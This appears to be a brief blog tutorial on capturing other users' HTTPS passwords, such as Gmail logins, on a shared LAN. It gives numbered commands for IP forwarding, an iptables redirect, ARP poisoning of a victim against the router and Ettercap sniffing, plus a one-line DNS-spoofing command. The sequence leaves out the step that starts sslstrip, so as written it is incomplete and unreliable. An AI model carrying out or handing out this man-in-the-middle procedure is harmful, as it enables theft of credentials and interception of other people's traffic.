But we couldn't Sniff any ssl passwords like gmail etc.
They use SSL Technology that is called as Secure Socket Layer the data sent over SSL will be encrypted and at the receiver side it gets decrypted and normal data gets processed .
When you are sniffing in the network the websites using normal HTTP protocol / data sent over port 80 will be in plain text so when you poison the router we get the plain text of what we are sniffing.
To avoid this gmail and popular websites adopted HTTPS technology which send the encrypted data over network so that even if you sniff the packets all you get is cipher text.
Now we will see how to Sniff the SSL Passwords when on Same Network ( LAN )
Tools Required ( this is for linux )
ArpSpoof
SSLStrip
Ettercap
1: echo 1 >/proc/sys/net/ipv4/ip_forward
2: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j
REDIRECT --to-ports 10000
3:arpspoof -i eth0 192.168.1.158 192.168.1.1
4:ettercap -T -q -i eth0
and finally we got this :D
DNS spoofing
ettercap -T -q -i eth0 -P dns_spoof -M arp
No comments:
Post a Comment